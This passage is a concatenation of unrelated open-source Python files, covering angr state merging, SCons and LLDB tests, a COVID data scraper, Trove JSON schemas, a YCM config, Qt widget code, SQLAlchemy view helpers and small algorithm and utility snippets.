common_fd = common_ancestor.fd[fd]
except (AttributeError, KeyError):
common_fd = None
merging_occurred |= self.fd[fd].merge(
[o.fd[fd] for o in others],
merge_conditions,
common_ancestor=common_fd)
for ident in self.sockets:
try:
common_sock = common_ancestor.sockets[ident]
except (AttributeError, KeyError):
common_sock = None
merging_occurred |= self.sockets[ident].merge(
[o.sockets[ident] for o in others],
merge_conditions,
common_ancestor=common_sock)
# pylint: disable=no-member
# pylint seems to be seriously flipping out here for reasons I'm unsure of
# it thinks others is a list of bools somehow
merging_occurred |= self.stdin.merge([o.stdin for o in others], merge_conditions, common_ancestor=common_ancestor.stdin if common_ancestor is not None else None)
merging_occurred |= self.stdout.merge([o.stdout for o in others], merge_conditions, common_ancestor=common_ancestor.stdout if common_ancestor is not None else None)
merging_occurred |= self.stderr.merge([o.stderr for o in others], merge_conditions, common_ancestor=common_ancestor.stderr if common_ancestor is not None else None)
return merging_occurred
def widen(self, _):
raise SimMergeError("Widening the system state is unsupported")
def dump_file_by_path(self, path, **kwargs):
"""
Returns the concrete content for a file by path.
:param path: file path as string
:param kwargs: passed to state.solver.eval
:return: file contents as string
"""
file = self.state.fs.get(path)
if file is None:
return None
return file.concretize(**kwargs)
def dumps(self, fd, **kwargs):
"""
Returns the concrete content for a file descriptor.
BACKWARD COMPATIBILITY: if you ask for file descriptors 0 1 or 2, it will return the data from stdin, stdout,
or stderr as a flat string.
:param fd: A file descriptor.
:return: The concrete content.
:rtype: str
"""
if 0 <= fd <= 2:
data = [self.stdin, self.stdout, self.stderr][fd].concretize(**kwargs)
if type(data) is list:
data = b''.join(data)
return data
return self.get_fd(fd).concretize(**kwargs)
from angr.sim_state import SimState
SimState.register_default('posix', SimSystemPosix)
from ..errors import SimPosixError, SimSolverError, SimMergeError
|
py | b415b236e4998b6999d49e97ec97d959597bbc81 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Libs/LIBSUFFIX.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
import TestSCons
test = TestSCons.TestSCons()
test.pass_test() #XXX Short-circuit until this is implemented.
test.write('SConstruct', """
""")
test.run(arguments = '.')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
py | b415b2f7f42e00d7bcb0992fd3c503540e3e5a81 | #!/usr/bin/env python
import re
import scrape_common as sc
import scrape_vs_common as svc
# get all PDFs
for url in svc.get_vs_weekly_pdf_urls():
td = sc.TestData(canton='VS', url=url)
pdf = sc.download_content(url, silent=True)
td.week, td.year = svc.get_vs_weekly_general_data(pdf)
content = sc.pdftotext(pdf, page=2, raw=True)
content = re.sub(r'(\d)\‘(\d)', r'\1\2', content)
td.total_tests = sc.find(r'Anzahl durchgef.hrter Tests.*[\s|\(](\d+)[\s|\.]', content)
td.positivity_rate = sc.find(r'Die\s+Positivitätsrate.*\n?.*\s(\d+\.?\d?)%\s.*gegen.ber\s\d+\.?\d?%', content)
if not td.positivity_rate:
td.positivity_rate = sc.find(r'Die\s+Positivitätsrate.*\n?.*\s(\d+\.?\d?)%', content)
# ignore PDFs not providing total count
if not td.total_tests:
continue
print(td)
|
py | b415b3242324223ce5d4b6234469818be11fd27c | # Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from trove.common import cfg
CONF = cfg.CONF
flavorref = {
'oneOf': [
{
"type": "string",
"minLength": 8,
"pattern": 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]'
'|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
},
{
"type": "string",
"maxLength": 5,
"pattern": "[0-9]+"
},
{
"type": "integer"
}]
}
volume_size = {
"oneOf": [
{
"type": "integer",
"minimum": 0
},
{
"type": "string",
"minLength": 1,
"pattern": "[0-9]+"
}]
}
non_empty_string = {
"type": "string",
"minLength": 1,
"maxLength": 255,
"pattern": "^.*[0-9a-zA-Z]+.*$"
}
host_string = {
"type": "string",
"minLength": 1,
"pattern": "^[%]?[\w(-).]*[%]?$"
}
name_string = {
"type": "string",
"minLength": 1,
"maxLength": 16,
"pattern": "^.*[0-9a-zA-Z]+.*$"
}
uuid = {
"type": "string",
"minLength": 1,
"maxLength": 64,
"pattern": "^([0-9a-fA-F]){8}-([0-9a-fA-F]){4}-([0-9a-fA-F]){4}"
"-([0-9a-fA-F]){4}-([0-9a-fA-F]){12}$"
}
volume = {
"type": "object",
"required": ["size"],
"properties": {
"size": volume_size,
"required": True
}
}
databases_ref_list = {
"type": "array",
"minItems": 0,
"uniqueItems": True,
"items": {
"type": "object",
"required": ["name"],
"additionalProperties": True,
"properties": {
"name": non_empty_string
}
}
}
databases_ref_list_required = {
"type": "array",
"minItems": 0,
"uniqueItems": True,
"items": {
"type": "object",
"required": ["name"],
"additionalProperties": True,
"properties": {
"name": non_empty_string
}
}
}
databases_ref = {
"type": "object",
"required": ["databases"],
"additionalProperties": True,
"properties": {
"databases": databases_ref_list_required
}
}
databases_def = {
"type": "array",
"minItems": 0,
"items": {
"type": "object",
"required": ["name"],
"additionalProperties": True,
"properties": {
"name": non_empty_string,
"character_set": non_empty_string,
"collate": non_empty_string
}
}
}
user_attributes = {
"type": "object",
"additionalProperties": True,
"minProperties": 1,
"properties": {
"name": name_string,
"password": non_empty_string,
"host": host_string
}
}
users_list = {
"type": "array",
"minItems": 0,
"items": {
"type": "object",
"required": ["name", "password"],
"additionalProperties": True,
"properties": {
"name": name_string,
"password": non_empty_string,
"host": host_string,
"databases": databases_ref_list
}
}
}
instance = {
"create": {
"type": "object",
"required": ["instance"],
"additionalProperties": True,
"properties": {
"instance": {
"type": "object",
"required": ["name", "flavorRef",
"volume" if CONF.trove_volume_support else None],
"additionalProperties": True,
"properties": {
"name": non_empty_string,
"flavorRef": flavorref,
"volume": volume,
"databases": databases_def,
"users": users_list,
"service_type": non_empty_string,
"restorePoint": {
"type": "object",
"required": ["backupRef"],
"additionalProperties": True,
"properties": {
"backupRef": uuid
}
},
"availability_zone": non_empty_string
}
}
}
},
"action": {
"resize": {
"volume": {
"type": "object",
"required": ["resize"],
"additionalProperties": True,
"properties": {
"resize": {
"type": "object",
"required": ["volume"],
"additionalProperties": True,
"properties": {
"volume": volume
}
}
}
},
'flavorRef': {
"type": "object",
"required": ["resize"],
"additionalProperties": True,
"properties": {
"resize": {
"type": "object",
"required": ["flavorRef"],
"additionalProperties": True,
"properties": {
"flavorRef": flavorref
}
}
}
}
},
"restart": {
"type": "object",
"required": ["restart"],
"additionalProperties": True,
"properties": {
"restart": {
"type": "object"
}
}
}
}
}
mgmt_instance = {
"action": {
'migrate': {
"type": "object",
"required": ["migrate"],
"additionalProperties": True,
"properties": {
"migrate": {
"type": "object"
}
}
},
"reboot": {
"type": "object",
"required": ["reboot"],
"additionalProperties": True,
"properties": {
"reboot": {
"type": "object"
}
}
},
"stop": {
"type": "object",
"required": ["stop"],
"additionalProperties": True,
"properties": {
"stop": {
"type": "object"
}
}
}
}
}
user = {
"create": {
"name": "users:create",
"type": "object",
"required": ["users"],
"properties": {
"users": users_list
}
},
"update_all": {
"users": {
"type": "object",
"required": ["users"],
"additionalProperties": True,
"properties": {
"users": users_list
}
},
"databases": databases_ref
},
"update": {
"type": "object",
"required": ["user"],
"additionalProperties": True,
"properties": {
"user": user_attributes
}
}
}
dbschema = {
"create": {
"type": "object",
"required": ["databases"],
"additionalProperties": True,
"properties": {
"databases": databases_def
}
}
}
backup = {
"create": {
"name": "backup:create",
"type": "object",
"required": ["backup"],
"properties": {
"backup": {
"type": "object",
"required": ["instance", "name"],
"properties": {
"description": non_empty_string,
"instance": uuid,
"name": non_empty_string
}
}
}
}
}
account = {
'create': {
"type": "object",
"name": "users",
"required": ["users"],
"additionalProperties": True,
"properties": {
"users": users_list
}
}
}
|
py | b415b4368969607b0b930cccf8a8bf8c6deb1997 | # Generated by YCM Generator at 2021-09-26 10:30:24.462423
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
flags = [
'-x',
'c',
'-I..',
'-Werror',
'-std=gnu99',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.C', '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.H', '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
def Settings( **kwargs ):
language = kwargs[ 'language' ]
if language == 'cfamily':
return {
'flags': flags
}
return {}
|
py | b415b64ac69f067220a64f37c8e8232ff063026b | #Given an Array of integers,return indices of two numbers such that they add uptoa specific target.
#You may assume that each input would have exactly one solution an you may have not use the same element twice
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
h ={}
for i, num in enumerate(nums):
n = target-num
if n not in h:
h[num] =i
else:
return [h[n],i] |
py | b415b69d052928ca7be8c03576fbd09d11302c6b | # Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import reframe as rfm
import reframe.utility.sanity as sn
@rfm.simple_test
class HelloTest(rfm.RegressionTest):
def __init__(self):
self.valid_systems = ['*']
self.valid_prog_environs = ['*']
self.sourcepath = 'hello.c'
self.sanity_patterns = sn.assert_found(r'Hello, World\!', self.stdout)
|
py | b415b6c32edbb3286f6bfde7ad9a2e0821a41ab7 | from PySide2.QtWidgets import QSpacerItem, QWidget
from PySide2.QtCore import Signal
from SciDataTool.GUI.WAxisManager.Ui_WAxisManager import Ui_WAxisManager
from SciDataTool.GUI.WSliceOperator.WSliceOperator import WSliceOperator
from SciDataTool.Functions import axes_dict, rev_axes_dict
EXTENSION_DICT = {
"slice": ["rss", "sum", "rms", "mean", "integrate", "list", "single"],
"axis": [
"derivate",
"oneperiod",
"antiperiod",
"smallestperiod",
"pattern",
"axis_data",
"interval",
"whole",
],
}
class WAxisManager(Ui_WAxisManager, QWidget):
"""Widget that will handle the selection of the axis as well as generating WDataExtractor"""
refreshNeeded = Signal()
refreshRange = Signal()
def __init__(self, parent=None):
"""Initializing the widget by hiding/showing widget and connecting buttons
Parameters
----------
self : WAxisManager
a WAxisManager object
parent : QWidget
The parent widget
"""
# Build the interface according to the .ui file
QWidget.__init__(self, parent=parent)
self.setupUi(self)
self.axes_list = list()
# Managing the signal emitted by the WAxisSelector widgets
self.w_axis_1.axisChanged.connect(self.axis_1_updated)
self.w_axis_2.axisChanged.connect(self.axis_2_updated)
# The action in axis 2 is by default the one chosen in axis 1
self.w_axis_1.actionChanged.connect(lambda: self.fft_sync("axis 1"))
self.w_axis_2.actionChanged.connect(lambda: self.fft_sync("axis 2"))
self.w_axis_1.refreshNeeded.connect(self.update_needed)
self.w_axis_2.refreshNeeded.connect(self.update_needed)
def axis_1_updated(self):
"""Method that remove the axis selected in w_axis_1 from w_axis_2 and call the method that generates
the layout with the WDataExtractor.
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
# Making sure that when axis 1 is updated, axis 1 and 2 are both on "None" for the action combobox
self.fft_sync("axis 1")
# Recovering the axis selected by the user removing it from the the second axis combobox
self.w_axis_2.remove_axis(self.w_axis_1.get_axis_selected())
def axis_2_updated(self):
"""Method that make sure that when axis 2 is selected (None->?) it has the same fft/ifft combobox selected as axis1
then generates Data Selection
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
# Making sure that when axis 1 is updated, axis 1 and 2 are both on "None" for the action combobox
self.fft_sync("axis 1")
def gen_slice_op(self):
"""Method that gen the right WDataExtrator widget according to the axis selected by the user in the UI
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
# Step 1 : Recovering the axis that must be generated (those that are not selected)
# Getting all the possible axes
axes_list_1 = self.w_axis_1.get_axes_name()[:]
axes_list_2 = self.w_axis_2.get_axes_name()[:]
# Getting the axes selected and removing them from the right axes_list
axis_selected_1 = self.w_axis_1.get_axis_selected()
axis_selected_2 = self.w_axis_2.get_axis_selected()
axes_list_1.remove(axis_selected_1)
if axis_selected_2 in axes_list_2:
axes_list_2.remove(axis_selected_2)
# Selecting the axes that are in common between the two axes lists
axes_gen = list()
axes_gen = [ax for ax in axes_list_1 if ax in axes_list_2]
for ax in self.axes_list:
if ax.is_overlay:
axes_gen.append(ax.name)
# Step 2 : Removing the items that are in the layout currently
for i in reversed(range(self.lay_data_extract.count())):
self.lay_data_extract.takeAt(i).widget().setParent(None)
# Step 3 : For each axis available, adding a WSliceOperator widget inside the layout
# If there are no slice to do (two axis available and selected before) then we hide the groupBox
if len(axes_gen) != 0:
self.g_data_extract.show()
self.w_slice_op = list()
for axis in axes_gen:
temp = WSliceOperator(self.g_data_extract)
temp.setObjectName(axis)
for ax in self.axes_list:
if (
ax.name == axis
or axis in axes_dict
and ax.name in axes_dict[axis]
or axis in rev_axes_dict
and ax.name in rev_axes_dict[axis]
):
temp.update(ax)
temp.refreshNeeded.connect(self.update_needed)
self.w_slice_op.append(temp)
self.lay_data_extract.addWidget(temp)
else:
self.w_slice_op = list()
self.g_data_extract.hide()
self.update_needed()
def get_axes_selected(self):
"""Method that return the axes chosen by the user and their unit as a string
so that we can use them to plot the data.
Parameters
----------
self : WAxisManager
a WAxisManager object
Output
---------
string
name of the axis and their units
"""
axes_selected = list()
# Recovering the first axis
axes_selected.append(self.w_axis_1.get_axis_unit_selected())
# If a second axis is selected, then we add it as well
if self.w_axis_2.get_axis_unit_selected() != "None":
axes_selected.append(self.w_axis_2.get_axis_unit_selected())
return axes_selected
def get_operation_selected(self):
"""Method that return the operations chosen by the user and the related axis as a string
so that we can use them to plot the data.
Parameters
----------
self : WAxisManager
a WAxisManager object
Output
---------
string
name of the operation and its axis
"""
return [wid.get_operation_selected() for wid in self.w_slice_op]
def fft_sync(self, axis_changed):
"""Method that will check the action chosen and that update the other action combobox to have the same action.
So that, by default, we have FFT and FFT or "None" and "None"
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
if axis_changed == "axis 1" and "FFT" in [
self.w_axis_1.c_action.itemText(i)
for i in range(self.w_axis_1.c_action.count())
]:
action_selected = self.w_axis_1.get_current_action_name()
self.w_axis_2.set_action(action_selected)
self.gen_slice_op()
elif axis_changed == "axis 2" and "FFT" in [
self.w_axis_2.c_action.itemText(i)
for i in range(self.w_axis_2.c_action.count())
]:
action_selected = self.w_axis_2.get_current_action_name()
self.w_axis_1.set_action(action_selected)
self.gen_slice_op()
def set_axis_widgets(
self, data, axes_request_list, frozen_type=0, is_keep_config=False
):
"""Method used to set the axes of the Axes group box as well as setting the widgets of the DataSelection groupbox
Parameters
----------
self : WAxisManager
a WAxisManager object
data : DataND
The DataND object that we want to plot
axes_request_list:
list of RequestedAxis which are the info given for the autoplot (for the axes and DataSelection)
frozen_type : int
0 to let the user modify the axis of the plot, 1 to let him switch them, 2 to not let him change them, 3 to freeze both axes and operations
"""
if is_keep_config: # Only update slider
for wid in self.w_slice_op:
if hasattr(wid, "axis_value"):
wid.update_floatEdit(is_refresh=False)
else:
# Step 1 : If only one axis is given with the object, then we hide w_axis_2 and g_data_extract
# We also have to hide if we have more than one axis but one have is_overlay = True
if len(data.get_axes()) == 1 or (
len(data.get_axes())
- len([ax for ax in data.get_axes() if ax.is_overlay == True])
== 1
):
self.w_axis_2.hide()
self.g_data_extract.hide()
else:
self.w_axis_2.show()
self.g_data_extract.show()
# Step 2 : If we have user input, the we set the UI according to user_input.
# Otherwise we use the default info
self.w_axis_1.blockSignals(True)
self.w_axis_2.blockSignals(True)
if axes_request_list == []:
# Case where no user_input was given
# Sending the info of data to the widget (mainly the axis)
self.axes_list = data.get_axes()
self.w_axis_1.update(self.axes_list)
self.w_axis_2.update(self.axes_list, axis_name="Y")
# Updating w_axis_2 according to w_axis_1 then generating DataSelection
self.axis_1_updated()
else:
# Case where a userinput was given (auto plot)
# If user_input are given (auto-plot), we have to process them
axes_list = [
ax
for ax in axes_request_list
if ax.extension in EXTENSION_DICT["axis"]
]
slices_op_list = [
ax
for ax in axes_request_list
if ax.extension in EXTENSION_DICT["slice"]
]
# Sending the info of data to the widget (mainly the axis)
self.axes_list = data.get_axes()
self.w_axis_1.update(self.axes_list)
self.w_axis_2.update(self.axes_list, axis_name="Y")
# Setting the axis selected in w_axis_1 according to user_input_list
self.w_axis_1.set_axis(axes_list[0])
# Updating w_axis_2 according to w_axis_1 then generating DataSelection
self.axis_1_updated()
# Setting the axis selected in w_axis_1 according to user_input_list if we have a second axis
if len(axes_list) == 2:
self.w_axis_2.set_axis(axes_list[1])
# Making sure that we have the same fft/ifft selected for both axis
self.axis_2_updated()
# Generating DataSelection with the input of user if they are given or by default (like in a manual plot)
if len(slices_op_list) != 0:
self.set_slice_op(slices_op_list)
else:
self.gen_slice_op()
# Depending on the value of frozen type we are going to act on the UI
if frozen_type == 1 and len(axes_list) == 2:
# Recovering the axis requested by the user as they will be soft frozen (possible to switch but not possible to choose another axis)
axes_list_name = [ax.name for ax in axes_list]
axes_soft_frozen = [
ax for ax in self.axes_list if ax.name in axes_list_name
]
# We update the WAxisSelector widget with the axes that will be soft frozen
self.w_axis_1.update(axes_soft_frozen)
self.w_axis_2.update(axes_soft_frozen)
self.axis_1_updated()
elif frozen_type == 2:
# If we want to hard freeze the axis, we just have to disable the axis comboboxes
self.w_axis_1.c_axis.setDisabled(True)
self.w_axis_2.c_axis.setDisabled(True)
elif frozen_type == 3:
# Freezing the axes
self.w_axis_1.c_axis.setDisabled(True)
self.w_axis_1.c_action.setDisabled(True)
self.w_axis_2.c_axis.setDisabled(True)
self.w_axis_2.c_action.setDisabled(True)
# Freezing the operations
for w_slice in self.w_slice_op:
w_slice.b_action.setDisabled(True)
w_slice.c_operation.setDisabled(True)
w_slice.lf_value.setDisabled(True)
w_slice.slider.setDisabled(True)
if len(axes_list) == 1:
self.w_axis_2.hide()
self.w_axis_1.blockSignals(False)
self.w_axis_2.blockSignals(False)
def set_slice_op(self, user_input_list):
"""Method that set the right operation inside each WSliceOperator inside of w_slice_op
according to user input (auto plot).
Parameters
----------
self : WAxisManager
a WAxisManager object
user_input_list : list
list of the inputs from the user to set the DataSelection (auto-plot)
"""
for wid in self.w_slice_op:
wid.set_operation(user_input_list[self.w_slice_op.index(wid)])
def update_needed(self):
"""Method that emits a signal (refreshNeeded) that will be used to automaticaly update the plot inside the GUI.
This signal is triggered by other signals comming from WSliceOperator or WAxisSelector.
refreshRange is a different signal that we use to update the values of min and max inside w_range
Parameters
----------
self : WAxisManager
a WAxisManager object
"""
self.refreshNeeded.emit()
self.refreshRange.emit()
|
py | b415b832993833e0dfbe65ac7d0f153504a09437 | # TestSwiftVersion.py
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ------------------------------------------------------------------------------
"""
Test that LLDB can debug code generated by the Swift compiler for different versions of the language
"""
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
import lldbsuite.test.lldbutil as lldbutil
import os
import os.path
import time
import unittest2
class TestSwiftVersion(TestBase):
mydir = TestBase.compute_mydir(__file__)
@skipUnlessDarwin
@swiftTest
def test_cross_module_extension(self):
"""Test that LLDB can debug different Swift language versions"""
self.build()
self.do_test()
def setUp(self):
TestBase.setUp(self)
def do_test(self):
"""Test that LLDB can debug different Swift language versions"""
def cleanup():
lldbutil.execute_command("make cleanup")
self.addTearDownHook(cleanup)
exe_name = "main"
exe_path = self.getBuildArtifact(exe_name)
tests = [
{ 'file' : "mod5.swift",
'source_regex' : "break 5",
'expr' : "S5().i",
'substr' : "5" },
{ 'file' : "mod4.swift",
'source_regex' : "break 4",
'expr' : "S4().i",
'substr' : "4" }
]
# Create the target
target = self.dbg.CreateTarget(exe_path)
self.assertTrue(target, VALID_TARGET)
self.registerSharedLibrariesWithTarget(target, ['mod4', 'mod5'])
for t in tests:
source_name = t['file']
source_spec = lldb.SBFileSpec(source_name)
breakpoint = target.BreakpointCreateBySourceRegex(t['source_regex'], source_spec)
self.assertTrue(breakpoint.GetNumLocations() > 0, "Breakpoint set sucessfully with file " + source_name + ", regex " + t['source_regex'])
process = target.LaunchSimple(None, None, os.getcwd())
self.assertTrue(process, PROCESS_IS_VALID)
for t in tests:
thread = process.GetSelectedThread()
frame = thread.GetFrameAtIndex(0)
val = frame.EvaluateExpression(t['expr'])
self.assertTrue(t['substr'] in str(val.GetValue()), "Expression " + t['expr'] + " result " + val.GetValue() + " has substring " + t['substr'])
process.Continue()
|
py | b415b84d2dd414e46f5a23acb1f489e6114fc560 | from waitress import serve
import logging
import sys
import signal
from vmtestserver.server import app
logger = logging.getLogger(__name__)
def set_up_logging():
# setup logging on stdout
logger = logging.getLogger('')
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler(stream=sys.stdout))
logger = logging.getLogger('azure')
logger.setLevel(logging.WARNING)
logger = logging.getLogger('pika')
logger.setLevel(logging.WARNING)
def signal_term_handler(signum, _):
logger.info('Received signal %d', signum)
raise KeyboardInterrupt() # this will stop waitress from serving
if __name__ == '__main__':
set_up_logging()
try:
logger.info('Starting...')
logger.debug('Setting up SIGTERM handler')
signal.signal(signal.SIGTERM, signal_term_handler)
serve(app, port=80)
logger.info('Finished.')
except KeyboardInterrupt:
logger.info('Interrupted.')
|
py | b415b852eb1504fe65a58d7db038c31b5386abda | """
This file is part of the TheLMA (THe Laboratory Management Application) project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Utilities to create/drop views.
Based on a recipe published in:
http://www.sqlalchemy.org/trac/wiki/UsageRecipes/Views
"""
from sqlalchemy.sql import table
from sqlalchemy.ext import compiler
from sqlalchemy.schema import DDLElement
__docformat__ = 'reStructuredText en'
__all__ = ['CreateView',
'DropView',
'view_factory',
]
class CreateView(DDLElement):
def __init__(self, name, selectable): # pylint: disable=W0231
self.name = name
self.selectable = selectable
class DropView(DDLElement):
def __init__(self, name): # pylint: disable=W0231
self.name = name
@compiler.compiles(CreateView, 'postgresql')
def create_view_compile_postgresql(element, compiler, **kw): # pylint: disable=W0621,W0613
selection = compiler.sql_compiler.process(element.selectable)
stmt = "CREATE OR REPLACE VIEW %s AS %s" % (element.name, selection)
# FIXME: we should not combine the statement and params here.
# it is a SQLAlchemy bug... report it.
params = {}
for k, v in element.selectable.compile().params.iteritems():
params[k] = ("'%s'" % v) if isinstance(v, basestring) else v
return stmt % params
@compiler.compiles(CreateView, 'sqlite')
def create_view_compile_sqlite(element, compiler, **kw): # pylint: disable=W0621,W0613
# FIXME: duplicate code
# FIXME: it seems that there is a bug in SQLAlchemy and creating views
# this way emits an exception
selection = compiler.sql_compiler.process(element.selectable)
stmt = "CREATE VIEW %s AS %s" % (element.name, selection)
# FIXME: we should not combine the statement and params here.
# it is a SQLAlchemy bug... report it.
params = {}
for k, v in element.selectable.compile().params.iteritems():
params[k] = ("'%s'" % v) if isinstance(v, basestring) else v
return stmt % params
@compiler.compiles(DropView)
def drop_view_compile(element, compiler, **kw): # pylint: disable=W0621,W0613
return "DROP VIEW %s" % (element.name)
def view_factory(name, metadata, selectable):
if not hasattr(metadata, 'views'):
metadata.views = {}
metadata.views[name] = table(name)
for c in selectable.c:
c._make_proxy(metadata.views[name]) # pylint: disable=W0212
CreateView(name, selectable).execute_at('after-create', metadata)
DropView(name).execute_at('before-drop', metadata)
return metadata.views[name]
|
py | b415b858d8a599eba97f187eaf86268f669c5202 | import unittest
import ctypes
class DynamicArray:
def __init__(self):
self._n = 0
self._capacity = 1
self._A = self._make_array(self._capacity)
@staticmethod
def _make_array(c):
return (c * ctypes.py_object)()
def __len__(self):
return self._n
def __getitem__(self, k):
if not -self._n <= k < self._n:
raise IndexError("invalid index")
return self._A[k] if k >= 0 else self._A[self._n + k]
def append(self, obj):
if self._n == self._capacity:
self._resize(2 * self._capacity)
self._A[self._n] = obj
self._n += 1
def _resize(self, c):
B = self._make_array(c)
for k in range(self._n):
B[k] = self._A[k]
self._A = B
self._capacity = c
class MyTestCase(unittest.TestCase):
def test_something(self):
da = DynamicArray()
for i in range(10):
da.append(i)
self.assertEqual(8, da[-2])
if __name__ == '__main__':
unittest.main()
|
py | b415b8689a72d0dfd32ae5b145e413087111bac6 | from ray.rllib.utils.framework import try_import_tf
tf = try_import_tf()
def explained_variance(y, pred):
_, y_var = tf.nn.moments(y, axes=[0])
_, diff_var = tf.nn.moments(y - pred, axes=[0])
return tf.maximum(-1.0, 1 - (diff_var / y_var))
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5, delta * (tf.abs(x) - 0.5 * delta))
def reduce_mean_ignore_inf(x, axis):
"""Same as tf.reduce_mean() but ignores -inf values."""
mask = tf.not_equal(x, tf.float32.min)
